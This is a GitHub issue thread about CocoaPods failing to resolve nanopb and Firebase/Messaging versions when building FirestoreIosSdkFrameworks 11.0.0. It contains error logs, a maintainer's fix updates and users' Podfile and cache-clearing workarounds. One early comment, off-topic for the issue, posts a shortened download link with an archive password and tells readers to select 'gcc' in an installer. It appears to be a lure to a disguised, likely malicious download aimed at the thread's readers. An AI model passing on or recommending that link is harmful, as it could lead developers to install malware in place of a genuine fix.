### ISSUE TITLE
Failed to build v11.0.0

### ISSUE THREAD

**Issue by victortive** [invertase/firestore-ios-sdk-frameworks#108]
```
[!] CocoaPods could not find compatible versions for pod "Firebase/Messaging":
  In Podfile:
    Firebase/Messaging

    firebase_messaging (from `.symlinks/plugins/firebase_messaging/ios`) was resolved to 15.1.0, which depends on
      Firebase/Messaging (= 11.0.0)

CocoaPods could not find compatible versions for pod "nanopb":
  In Podfile:
    FirebaseFirestore (from `https://github.com/invertase/firestore-ios-sdk-frameworks.git`, tag `11.0.0`) was resolved to 11.0.0, which depends on
      FirebaseFirestoreBinary (= 11.0.0) was resolved to 11.0.0, which depends on
        FirebaseFirestoreInternalBinary (= 11.0.0) was resolved to 11.0.0, which depends on
          nanopb (< 2.30911.0, >= 2.30908.0)

    firebase_in_app_messaging (from `.symlinks/plugins/firebase_in_app_messaging/ios`) was resolved to 0.8.0-5, which depends on
      Firebase/InAppMessaging (= 11.0.0) was resolved to 11.0.0, which depends on
        FirebaseInAppMessaging (~> 11.0.0-beta) was resolved to 11.0.0-beta, which depends on
          nanopb (~> 3.30910.0)
```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by plungepool** [comment]
Experiencing same issue, seems recent as of this morning PST.

**Comment by Blackkadder** [comment]
same here. can't resolve nanopb dependency

**Comment by Blackkadder** [comment]
<img width="842" alt="image" src="https://github.com/user-attachments/assets/78130b65-fe7b-4a54-8706-6c1e681b2d2b">

working with 10.29.0 with firebase_core 3.3.0 works though

**Comment by plungepool** [comment]
@Blackkadder This is working for us!

**Comment by Lyokone** [comment]
Hi, thanks for reporting. I'm currently building the version with the fix, should be out in about an hour.

**Comment by Lyokone** [comment]
Might take a bit more time than expected, a new version of the iOS SDK was released in parallel (11.1.0) which means we will need to update some other things. In the mean time you can remove this line from your Podfile
```
  pod 'FirebaseFirestore', :git => 'https://github.com/invertase/firestore-ios-sdk-frameworks.git', :tag => "11.0.0"
```
Sorry for the inconvenience, working on the fix

**Comment by Lyokone** [comment]
Fix has been pushed, Cocoapods might need a bit of time to surface it through its CDN. I'll keep this issue open for the time being.

**Comment by liam-hp** [comment]
Oh just seeing this. Anyone who needs a quick fix just import the pod versions directly with `pod 'FirebaseSharedSwift', '10.25.0'`. See https://github.com/invertase/firestore-ios-sdk-frameworks/issues/110, I just added suggested updates to the readme as a solve for this issue

**Comment by amrgetment** [comment]
after 16 hours

```
firebase_performance: Using Firebase SDK version '11.0.0' defined in 'firebase_core'
[!] CocoaPods could not find compatible versions for pod "nanopb":
  In Podfile:
    FirebaseFirestore (from `https://github.com/invertase/firestore-ios-sdk-frameworks.git`, tag `11.0.0`) was resolved to 11.0.0, which depends on
      FirebaseFirestoreBinary (= 11.0.0) was resolved to 11.0.0, which depends on
        FirebaseFirestoreInternalBinary (= 11.0.0) was resolved to 11.0.0, which depends on
          nanopb (< 2.30911.0, >= 2.30908.0)

    firebase_messaging (from `.symlinks/plugins/firebase_messaging/ios`) was resolved to 15.1.0, which depends on
      Firebase/Messaging (= 11.0.0) was resolved to 11.0.0, which depends on
        FirebaseMessaging (~> 11.0.0) was resolved to 11.0.0, which depends on
          nanopb (~> 3.30910.0)
```

**Comment by btanev** [comment]
Hi @Lyokone 
Still facing the same issue as yesterday. I've tried:
- setting the podfile dependency to the commit hash of the updated tag `11.0.0` - `pod 'FirebaseFirestore', :git => 'https://github.com/invertase/firestore-ios-sdk-frameworks.git', :commit => '58e6c1f8b5d22464a05d97c9f607de617309e0d2'`
- cleaning all the cache of cocoapods - `pod cache clean --all`
- cleaning Xcode's `DerivedData` directory

```
[!] CocoaPods could not find compatible versions for pod "nanopb":
  In Podfile:
    FirebaseFirestore (from `https://github.com/invertase/firestore-ios-sdk-frameworks.git`, commit `58e6c1f8b5d22464a05d97c9f607de617309e0d2`) was resolved to 11.0.0, which depends on
      FirebaseFirestoreBinary (= 11.0.0) was resolved to 11.0.0, which depends on
        FirebaseFirestoreInternalBinary (= 11.0.0) was resolved to 11.0.0, which depends on
          nanopb (< 2.30911.0, >= 2.30908.0)

    firebase_crashlytics (from `.symlinks/plugins/firebase_crashlytics/ios`) was resolved to 4.1.0, which depends on
      Firebase/Crashlytics (= 11.0.0) was resolved to 11.0.0, which depends on
        FirebaseCrashlytics (~> 11.0.0) was resolved to 11.0.0, which depends on
          nanopb (~> 3.30910.0)
```

**Comment by jdbenito-atco** [comment]
Note that this issue is essentially a duplicate of https://github.com/firebase/flutterfire/issues/13228.

As I noted [here](https://github.com/firebase/flutterfire/issues/13228#issuecomment-2317687437), you can comment the `pod 'FirebaseFirestore', :git => 'https://github.com/invertase/firestore-ios-sdk-frameworks.git', :tag => '11.0.0'` line in your Podifile. That works around the `nanopb` warnings but builds get the following error:
```
❌  /Users/xxxxxxx/.pub-cache/hosted/pub.dev/cloud_firestore-5.3.0/ios/Classes/Private/FirestorePigeonParser.h:13:4: expected a type

+ (FIRFilter *_Nonnull)filterFromJson:(NSDictionary<NSString *, id> *_Nullable)map;
  ~~~~~~ ~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~


❌  /Users/xxxxxxx/.pub-cache/hosted/pub.dev/cloud_firestore-5.3.0/ios/Classes/Private/FirestorePigeonParser.h:15:4: expected a type

+ (FIRQuery *_Nonnull)parseQueryWithParameters:(nonnull PigeonQueryParameters *)parameters
   ^


❌  /Users/xxxxxxx/.pub-cache/hosted/pub.dev/cloud_firestore-5.3.0/ios/Classes/Private/FirestorePigeonParser.h:16:57: expected a type

                                     firestore:(nonnull FIRFirestore *)firestore
...
```
If I choose not to comment out the pod line described, I get this instead:
```
[!] CocoaPods could not find compatible versions for pod "FirebaseCoreExtension":
  In snapshot (Podfile.lock):
    FirebaseCoreExtension (= 11.1.0, ~> 11.0)

  In Podfile:
    FirebaseFirestore (from `https://github.com/invertase/firestore-ios-sdk-frameworks.git`, tag `11.0.0`) was resolved to 11.0.0, which depends on
      FirebaseFirestoreBinary (= 11.0.0) was resolved to 11.0.0, which depends on
        FirebaseCoreExtension (= 11.0.0)

Specs satisfying the `FirebaseCoreExtension (= 11.1.0, ~> 11.0), FirebaseCoreExtension (= 11.0.0)` dependency were found, but they required a higher minimum deployment target.
```

**Comment by marcellocamara** [comment]
> @amrgetment 
> after 16 hours

If you delete this lines you can install your pods and run your app:

> ```
>   pod 'FirebaseFirestore', 
>          :git => 'https://github.com/invertase/firestore-ios-sdk-frameworks.git', 
>          :tag => "x.y.z"
> ```

**Comment by jdbenito-atco** [comment]
> > @amrgetment
> > after 16 hours
> 
> If you delete this lines, from your `Podfile`, you can install your pods and run your app:
> 
> ```
> pod 'FirebaseFirestore', 
>        :git => 'https://github.com/invertase/firestore-ios-sdk-frameworks.git', 
>        :tag => "x.y.z"
> ```

I've already done that. Sadly I get the other error described above, i.e., the one with the ❌

**Comment by avenidz** [comment]
Same issue on my end right now.

[!] CocoaPods could not find compatible versions for pod "nanopb":
  In Podfile:
    FirebaseFirestore (from `https://github.com/invertase/firestore-ios-sdk-frameworks.git`, tag `11.0.0`) was resolved to 11.0.0, which depends on
      FirebaseFirestoreBinary (= 11.0.0) was resolved to 11.0.0, which depends on
        FirebaseFirestoreInternalBinary (= 11.0.0) was resolved to 11.0.0, which depends on
          nanopb (< 2.30911.0, >= 2.30908.0)

    firebase_crashlytics (from `.symlinks/plugins/firebase_crashlytics/ios`) was resolved to 4.1.0, which depends on
      Firebase/Crashlytics (= 11.0.0) was resolved to 11.0.0, which depends on
        FirebaseCrashlytics (~> 11.0.0) was resolved to 11.0.0, which depends on
          nanopb (~> 3.30910.0)

**Comment by razankv13** [comment]
> > > @amrgetment
> > > after 16 hours
> > 
> > 
> > If you delete this lines, from your `Podfile`, you can install your pods and run your app:
> > ```
> > pod 'FirebaseFirestore', 
> >        :git => 'https://github.com/invertase/firestore-ios-sdk-frameworks.git', 
> >        :tag => "x.y.z"
> > ```
> 
> I've already done that. Sadly I get the other error described above, i.e., the one with the ❌

try 
pod repo remove trunk
pod setup
pod install --repo-update

**Comment by kostasoft** [comment]
I added a constant to the Podfile 
`$FirebaseSDKVersion = '10.29.0'`
and commented out the 'FirebaseFirestore' versions of the pod
`pod 'FirebaseFirestore' #, '~> 11.0.0'`

**Comment by marcellocamara** [comment]
It's working for me now. You all could retry.

I've cleared my cache with `pod deintegrate` after trying the `pod remove trunk && pod setup`, and reinstalled all the pods using `pod install --repo-update` with this config:
```
pod 'FirebaseFirestore',
  :git => 'https://github.com/invertase/firestore-ios-sdk-frameworks.git',
  :tag => '11.0.0'
```

Successfully installed pods and launched the app 👍🏻

**Comment by AhsinMehmood** [comment]
Its working for me now 
You can try 
pod repo remove trunk &&
pod setup &&
pod install --repo-update

**Comment by rohansohonee1** [comment]
@Lyokone 
We are facing the issue right now in the code magic build.
```console
 CDN: trunk Relative path: Specs/0/3/5/Firebase/11.1.0/Firebase.podspec.json modified during this run! Returning local
    [!] CocoaPods could not find compatible versions for pod "Firebase/Messaging":
      In Podfile:
        Firebase/Messaging

        firebase_messaging (from `.symlinks/plugins/firebase_messaging/ios`) was resolved to 15.1.0, which depends on
          Firebase/Messaging (= 11.0.0)

    CocoaPods could not find compatible versions for pod "GoogleDataTransport":
      In Podfile:
        MLKitCommon (from `MLKitCommon.podspec.json`) was resolved to 8.0.0, which depends on
          GoogleDataTransport (~> 9.0)

        firebase_messaging (from `.symlinks/plugins/firebase_messaging/ios`) was resolved to 15.1.0, which depends on
          Firebase/Messaging (= 11.0.0) was resolved to 11.0.0, which depends on
            FirebaseMessaging (~> 11.0.0) was resolved to 11.0.0, which depends on
              GoogleDataTransport (~> 10.0)
```


Can you provide a solution for this?
